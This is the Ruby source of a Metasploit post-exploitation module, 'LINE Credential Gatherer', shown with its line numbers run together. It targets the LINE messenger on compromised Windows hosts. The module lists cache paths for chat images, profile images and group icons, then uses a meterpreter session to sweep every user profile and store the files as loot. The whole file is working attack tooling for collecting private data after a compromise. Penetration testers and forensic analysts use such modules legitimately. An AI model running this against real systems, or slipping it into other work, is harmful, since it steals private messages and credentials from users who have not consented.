Path: blob/master/modules/post/windows/gather/credentials/line.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post67include Msf::Post::File8include Msf::Post::Windows::UserProfiles9include Msf::Post::Windows::Packrat1011ARTIFACTS =12{13application: 'line',14app_category: 'chats',15gatherable_artifacts: [16{17filetypes: 'images',18path: 'LocalAppData',19dir: 'LINE',20artifact_file_name: '*.png',21description: 'Image cache with png extension',22credential_type: 'chat_log'23},24{25filetypes: 'images',26path: 'LocalAppData',27dir: 'LINE',28artifact_file_name: '*.jpeg',29description: 'Image cache for jpg cache',30credential_type: 'chat_log'31},32{33filetypes: 'images',34path: 'LocalAppData',35dir: 'LINE\\Cache\\p',36artifact_file_name: '*',37description: 'Image cache for profile images of users',38credential_type: 'chat_log'39},40{41filetypes: 'images',42path: 'LocalAppData',43dir: 'LINE\\Cache\\g',44artifact_file_name: '*',45description: 'Image cache for group icons',46credential_type: 'chat_log'47},48{49filetypes: 'images',50path: 'LocalAppData',51dir: 'LINE\\Cache\\m',52artifact_file_name: '*',53description: 'Image cache for images sent through chat',54credential_type: 'chat_log'55},56{57filetypes: 'images',58path: 'LocalAppData',59dir: 'LINE\\Cache\\e',60artifact_file_name: '*',61description: 'Image cache for profile images sent by official accounts',62credential_type: 'chat_log'63},64{65filetypes: 'images',66path: 'LocalAppData',67dir: 'LINE\\Data\\pizza',68artifact_file_name: '*',69description: 'Image cache for profile images of users',70credential_type: 'chat_log'71}72]73}.freeze7475def initialize(info = {})76super(77update_info(78info,79'Name' => 'LINE Credential Gatherer',80'Description' => %q{81This module searches for credentials in LINE desktop application on a Windows host. LINE is the most popular Instant Messenger app in Japan.82},83'License' => MSF_LICENSE,84'Author' => [85'Kazuyoshi Maruta',86'Daniel Hallsworth',87'Barwar Salim M',88'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org89],90'Platform' => ['win'],91'SessionTypes' => ['meterpreter'],92'Notes' => {93'Stability' => [CRASH_SAFE],94'Reliability' => [],95'SideEffects' => []96}97)98)99100register_options(101[102OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),103OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),104OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),105# enumerates the options based on the artifacts that are defined below106OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])107]108)109end110111def run112print_status('Filtering based on these selections: ')113print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")114print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")115print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")116117# used to grab files for each user on the remote host118grab_user_profiles.each do |userprofile|119run_packrat(userprofile, ARTIFACTS)120end121122print_status 'PackRat credential sweep completed'123end124end125126127